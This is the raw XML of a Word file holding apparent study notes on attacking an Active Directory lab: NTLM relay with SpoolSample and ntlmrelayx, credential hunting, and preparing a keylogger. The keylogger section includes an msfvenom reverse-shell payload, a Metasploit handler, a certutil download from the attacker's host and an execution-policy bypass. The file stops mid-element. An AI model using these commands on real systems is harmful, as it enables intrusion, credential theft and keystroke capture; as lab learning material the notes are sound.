        <w:t>Check Signing using Nmap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED5B85F" w14:textId="5BDFA6DE" w:rsidR="004C00EB" w:rsidRDefault="004C00EB" w:rsidP="004C00EB">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C00EB">
        <w:t>nmap --script=smb2-security-mode -p445 thmserver1.za.tryhackme.loc thmserver2.za.tryhackme.loc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF91674" w14:textId="77777777" w:rsidR="004345E3" w:rsidRDefault="004345E3" w:rsidP="004345E3">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="454B3433" w14:textId="19BBA1A0" w:rsidR="004345E3" w:rsidRPr="004345E3" w:rsidRDefault="004345E3" w:rsidP="004345E3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004345E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exploiting </w:t>
      </w:r>
      <w:r w:rsidRPr="004345E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="004345E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Relays</w:t>
      </w:r>
      <w:r w:rsidR="00A70AD4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Not Understanded good)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F8F06C" w14:textId="13113FD3" w:rsidR="003B19B9" w:rsidRDefault="003B19B9" w:rsidP="003B19B9">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r w:rsidR="004345E3" w:rsidRPr="004345E3">
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004345E3" w:rsidRPr="004345E3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="004345E3" w:rsidRPr="004345E3">
        <w:instrText>HYPERLINK "https://github.com/leechristensen/SpoolSample" \t "_blank"</w:instrText>
      </w:r>
      <w:r w:rsidR="004345E3" w:rsidRPr="004345E3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004345E3" w:rsidRPr="004345E3">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>SpoolSample</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004345E3" w:rsidRPr="004345E3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="004345E3" w:rsidRPr="004345E3">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tool on our attacking machine </w:t>
      </w:r>
      <w:r w:rsidR="004345E3" w:rsidRPr="004345E3">
        <w:t>to exploit the authentication relay</w:t>
      </w:r>
      <w:r w:rsidR="004345E3">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="004345E3" w:rsidRPr="004345E3">
        <w:t>It is a C# exploit</w:t>
      </w:r>
      <w:r w:rsidR="004345E3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6BA43A" w14:textId="77C14104" w:rsidR="00B9025E" w:rsidRDefault="004345E3" w:rsidP="003B19B9">
      <w:r>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId58" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="003B19B9" w:rsidRPr="003B19B9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Impacket</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003B19B9" w:rsidRPr="003B19B9">
        <w:t>'s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003B19B9" w:rsidRPr="003B19B9">
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId59" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="003B19B9" w:rsidRPr="003B19B9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>ntlmrelayx.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003B19B9" w:rsidRPr="003B19B9">
        <w:t xml:space="preserve"> to relay the authentication attempt </w:t>
      </w:r>
      <w:r w:rsidR="003B19B9">
        <w:t>to target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C35DDD" w14:textId="77777777" w:rsidR="003B19B9" w:rsidRDefault="003B19B9" w:rsidP="003B19B9"/>
    <w:p w14:paraId="7A430A12" w14:textId="09A3C2C8" w:rsidR="003B19B9" w:rsidRDefault="003B19B9" w:rsidP="003B19B9">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">On Our Attack Machine: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0779FA69" w14:textId="30978AAB" w:rsidR="003B19B9" w:rsidRDefault="003B19B9" w:rsidP="003B19B9">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B19B9">
        <w:t>python3.9 /opt/impacket/examples/ntlmrelayx.py -smb2support -t smb://"T</w:t>
      </w:r>
      <w:r>
        <w:t>ARGET-SERVER-</w:t>
      </w:r>
      <w:r w:rsidRPr="003B19B9">
        <w:t>IP" -debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DE8C5D" w14:textId="77777777" w:rsidR="004345E3" w:rsidRDefault="004345E3" w:rsidP="004126A1">
      <w:pPr>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A23CD69" w14:textId="66B85DFE" w:rsidR="004345E3" w:rsidRDefault="003B19B9" w:rsidP="004126A1">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">On Domain Joined Compromised Machine: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B88E8C" w14:textId="23EE663F" w:rsidR="003B19B9" w:rsidRDefault="003B19B9" w:rsidP="003B19B9">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="003B19B9">
        <w:t>C:\Tools\&gt;SpoolSample.exe THMSERVER2.za.tryhackme.loc "Attacker</w:t>
      </w:r>
      <w:r w:rsidR="00A70AD4">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="003B19B9">
        <w:t>IP"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B1B88D" w14:textId="095E4951" w:rsidR="003B19B9" w:rsidRDefault="003B19B9" w:rsidP="004126A1">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A70AD4">
        <w:t>On Attacker Machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10950237" w14:textId="3533F032" w:rsidR="00A70AD4" w:rsidRDefault="00A70AD4" w:rsidP="00A70AD4">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00A70AD4">
        <w:t>python3.9 ntlmrelayx.py -smb2support -t smb://"</w:t>
      </w:r>
      <w:r>
        <w:t>Target-Server-</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70AD4">
        <w:t>IP" -c 'whoami /all' -debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D5BD1F" w14:textId="77777777" w:rsidR="00A70AD4" w:rsidRDefault="00A70AD4" w:rsidP="004126A1"/>
    <w:p w14:paraId="790BCAE6" w14:textId="4CB70EDF" w:rsidR="00A70AD4" w:rsidRPr="00CA5B5C" w:rsidRDefault="00A70AD4" w:rsidP="00CA5B5C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5B5C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting AD Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B193DD7" w14:textId="6E1B819E" w:rsidR="003B19B9" w:rsidRPr="00F40CC6" w:rsidRDefault="00F40CC6" w:rsidP="00F40CC6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40CC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hunting for Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C86BED" w14:textId="646EB4C2" w:rsidR="003B19B9" w:rsidRDefault="00F40CC6" w:rsidP="004126A1">
      <w:r>
        <w:t>Enumerate User Behaviors, search for something that includes credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627A58ED" w14:textId="602AC905" w:rsidR="00F40CC6" w:rsidRDefault="00F40CC6" w:rsidP="00F40CC6">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00F40CC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.kdbx file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40CC6">
        <w:t>credential database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40CC6">
        <w:t>use Meterpreter's download command to recover this file</w:t>
      </w:r>
      <w:r>
        <w:t>, if it has a password we may crack it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF20C84" w14:textId="77777777" w:rsidR="00443C21" w:rsidRDefault="00443C21" w:rsidP="00443C21">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EEB695A" w14:textId="793802F3" w:rsidR="003B19B9" w:rsidRPr="00443C21" w:rsidRDefault="00443C21" w:rsidP="00443C21">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00443C21">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SYSTEM is Sometimes Too Privileged</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EFD547" w14:textId="186B5E52" w:rsidR="00443C21" w:rsidRPr="00443C21" w:rsidRDefault="00443C21" w:rsidP="00443C21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00443C21">
        <w:t xml:space="preserve">When </w:t>
      </w:r>
      <w:r>
        <w:t>we</w:t>
      </w:r>
      <w:r w:rsidRPr="00443C21">
        <w:t xml:space="preserve"> get </w:t>
      </w:r>
      <w:r w:rsidRPr="00443C21">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote code execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00443C21">
        <w:t xml:space="preserve"> (RCE) on a Windows system (like THMSERVER1), </w:t>
      </w:r>
      <w:r>
        <w:t>we</w:t>
      </w:r>
      <w:r w:rsidRPr="00443C21">
        <w:t xml:space="preserve"> often get a </w:t>
      </w:r>
      <w:r w:rsidRPr="00443C21">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SYSTEM shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00443C21">
        <w:t>—the most powerful account in Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD5DB2F" w14:textId="53B40FCC" w:rsidR="00443C21" w:rsidRPr="00443C21" w:rsidRDefault="00443C21" w:rsidP="00443C21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00443C21">
        <w:t xml:space="preserve">But </w:t>
      </w:r>
      <w:r w:rsidRPr="00443C21">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SYSTEM is not a human user</w:t>
      </w:r>
      <w:r w:rsidRPr="00443C21">
        <w:t>. It doesn’t interact with the desktop, doesn’t browse the web, and doesn’t type passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A468478" w14:textId="76FAF6AB" w:rsidR="00443C21" w:rsidRPr="00443C21" w:rsidRDefault="00443C21" w:rsidP="00443C21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00443C21">
        <w:t xml:space="preserve">So, if </w:t>
      </w:r>
      <w:r>
        <w:t>we</w:t>
      </w:r>
      <w:r w:rsidRPr="00443C21">
        <w:t xml:space="preserve"> want to </w:t>
      </w:r>
      <w:r w:rsidRPr="00443C21">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>steal credentials</w:t>
      </w:r>
      <w:r w:rsidRPr="00443C21">
        <w:t xml:space="preserve"> or access </w:t>
      </w:r>
      <w:r w:rsidRPr="00443C21">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user-specific apps/files</w:t>
      </w:r>
      <w:r w:rsidRPr="00443C21">
        <w:t xml:space="preserve">, you need to switch (or "migrate") your shell to the context of an </w:t>
      </w:r>
      <w:r w:rsidRPr="00443C21">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>actual logged-in user</w:t>
      </w:r>
      <w:r w:rsidRPr="00443C21">
        <w:t xml:space="preserve"> like THMSERVER1\trevor.local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5F2D13" w14:textId="77777777" w:rsidR="00443C21" w:rsidRDefault="00443C21" w:rsidP="00443C21"/>
    <w:p w14:paraId="6F347736" w14:textId="222E9036" w:rsidR="00443C21" w:rsidRDefault="00443C21" w:rsidP="00443C21">
      <w:r>
        <w:t>Suppose that We have a System Shell and need to make Keylogger attack to catch things that user type, so we will switch from system shell to login-user shell then make key logger attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050AFFF4" w14:textId="5D93741C" w:rsidR="000C3A2B" w:rsidRPr="000C3A2B" w:rsidRDefault="000C3A2B" w:rsidP="00443C21">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000C3A2B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>Firstly, get shell system shell on system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6CD0A1" w14:textId="43AFBA21" w:rsidR="00443C21" w:rsidRDefault="00443C21" w:rsidP="00B429F0">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create </w:t>
      </w:r>
      <w:r w:rsidRPr="00443C21">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell </w:t>
      </w:r>
      <w:r w:rsidRPr="00B429F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidRPr="00443C21">
        <w:t xml:space="preserve"> that opens a reverse </w:t>
      </w:r>
      <w:r w:rsidR="00B429F0">
        <w:t xml:space="preserve">meterpreter </w:t>
      </w:r>
      <w:r w:rsidRPr="00443C21">
        <w:t xml:space="preserve">connection back to </w:t>
      </w:r>
      <w:r>
        <w:t>us by</w:t>
      </w:r>
      <w:r w:rsidRPr="00443C21">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B429F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidRPr="00443C21">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D14679B" w14:textId="474E393C" w:rsidR="00443C21" w:rsidRDefault="00443C21" w:rsidP="00B429F0">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00443C21">
        <w:t>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=</w:t>
      </w:r>
      <w:r>
        <w:t>[Atatck-machine-IP]</w:t>
      </w:r>
      <w:r w:rsidRPr="00443C21">
        <w:t xml:space="preserve"> LPORT=</w:t>
      </w:r>
      <w:r>
        <w:t>[listenr-port]</w:t>
      </w:r>
      <w:r w:rsidRPr="00443C21">
        <w:t xml:space="preserve"> -f psh -o shell.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC9954A" w14:textId="77777777" w:rsidR="00B429F0" w:rsidRDefault="00443C21" w:rsidP="00B429F0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4EE1DD" w14:textId="49AAE46C" w:rsidR="003B19B9" w:rsidRDefault="00B429F0" w:rsidP="00B429F0">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r w:rsidRPr="00B429F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r w:rsidRPr="00B429F0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B429F0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>with a handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00B429F0">
        <w:t xml:space="preserve"> for your payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7575FACC" w14:textId="0A83417C" w:rsidR="00B429F0" w:rsidRDefault="00B429F0" w:rsidP="00B429F0">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>sudo msfconsole -q -x "use exploit/multi/handler; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A235DB8" w14:textId="40FF99F0" w:rsidR="00B429F0" w:rsidRDefault="00B429F0" w:rsidP="00B429F0">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>set PAYLOAD windows/x64/meterpreter/reverse_tcp; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CF2E31" w14:textId="46E4BEE3" w:rsidR="00B429F0" w:rsidRDefault="00B429F0" w:rsidP="00B429F0">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>set LHOST=[Attack-Machine-IP-in-Payload]; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2BD92E" w14:textId="67B5F079" w:rsidR="00B429F0" w:rsidRDefault="00B429F0" w:rsidP="00B429F0">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>set LPORT=[listener-port-in-payload]; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6419905A" w14:textId="0B0CD8F1" w:rsidR="00B429F0" w:rsidRDefault="00B429F0" w:rsidP="00B429F0">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>exploit"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1712DC18" w14:textId="47846804" w:rsidR="00B429F0" w:rsidRDefault="00B429F0" w:rsidP="00B429F0">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">We can open Metasploit only without a listener and run </w:t>
      </w:r>
      <w:r w:rsidRPr="00B429F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ncat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as listener</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AB5B66" w14:textId="525B63DC" w:rsidR="003B19B9" w:rsidRPr="00B429F0" w:rsidRDefault="00B429F0" w:rsidP="00B429F0">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B429F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deliver the Payload to Victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15989FBA" w14:textId="7A7D5B82" w:rsidR="004345E3" w:rsidRDefault="00B429F0" w:rsidP="00B429F0">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B429F0">
        <w:t xml:space="preserve">Use a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B429F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Python HTTP server</w:t>
      </w:r>
      <w:r w:rsidRPr="00B429F0">
        <w:t xml:space="preserve"> to host your shell.ps1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (On Attacking Machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE6C994" w14:textId="4CB5D830" w:rsidR="00B9025E" w:rsidRDefault="00B429F0" w:rsidP="00B429F0">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B429F0">
        <w:t>python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6437E19B" w14:textId="5EB1488F" w:rsidR="00B429F0" w:rsidRDefault="00B429F0" w:rsidP="00B429F0">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B429F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>On the target</w:t>
      </w:r>
      <w:r w:rsidRPr="00B429F0">
        <w:t>, use this command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B429F0">
        <w:t>(abusing certutil.exe) to download the script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B429F0">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>certutil.exe -urlcache -split -f http://&lt;your-IP&gt;/shell.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2956C7DF" w14:textId="63E87AD6" w:rsidR="00B429F0" w:rsidRDefault="00B429F0" w:rsidP="00B429F0">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>We Can use any windows tool to get the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C31FABC" w14:textId="7C74D686" w:rsidR="00B429F0" w:rsidRPr="00B429F0" w:rsidRDefault="00B429F0" w:rsidP="00B429F0">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B429F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>certutil.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00B429F0">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>: A legitimate Windows binary (LOLBIN) used to download files from the internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276C5391" w14:textId="2C64A218" w:rsidR="00B429F0" w:rsidRPr="00B429F0" w:rsidRDefault="00B429F0" w:rsidP="00B429F0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B429F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t>Then execute the payload on the target machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F0464C" w14:textId="351CA6C5" w:rsidR="00B429F0" w:rsidRDefault="00B429F0" w:rsidP="00B429F0">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B429F0">
        <w:t>powershell -ExecutionPolicy Bypass -File shell.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7E90D8" w14:textId="1410CAB6" w:rsidR="00B429F0" w:rsidRDefault="00B429F0" w:rsidP="004126A1">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="478D3E3F" w14:textId="67059697" w:rsidR="00B429F0" w:rsidRPr="00B429F0" w:rsidRDefault="00B429F0" w:rsidP="004126A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B429F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Now On Attacker Machin in Meterpreter </w:t>
      </w:r>
      <w:r w:rsidR="000C3A2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00B429F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50929B43" w14:textId="58B437EE" w:rsidR="00B429F0" w:rsidRDefault="000C3A2B" w:rsidP="000C3A2B">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="000C3A2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">As </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="000C3A2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>system user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we </w:t>
      </w:r>
      <w:r w:rsidR="00B429F0" w:rsidRPr="00B429F0">
        <w:t xml:space="preserve">list processes to find one running as the </w:t>
      </w:r>
      <w:r w:rsidR="00B429F0" w:rsidRPr="00B429F0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>actual user</w:t>
      </w:r>
      <w:r w:rsidR="00B429F0" w:rsidRPr="00B429F0">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B429F0" w:rsidRPr="00B429F0">
        <w:t>trevor.local</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B429F0" w:rsidRPr="00B429F0">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0982649B" w14:textId="190E49BC" w:rsidR="00B429F0" w:rsidRDefault="00B429F0" w:rsidP="00B429F0">
      <w:pPr>
        <w:pStyle w:val="code2"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r w:rsidRPr="00B429F0">
        <w:t>meterpreter&gt; ps | grep explorer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6911C6DD" w14:textId="61F277B7" w:rsidR="000C3A2B" w:rsidRPr="000C3A2B" w:rsidRDefault="000C3A2B" w:rsidP="000C3A2B">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C3A2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>We are looking for a process (like explorer.exe) that is owned by the actual user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCCAD33" w14:textId="7F5488D1" w:rsidR="00B429F0" w:rsidRDefault="000C3A2B" w:rsidP="000C3A2B">
      <w:pPr>
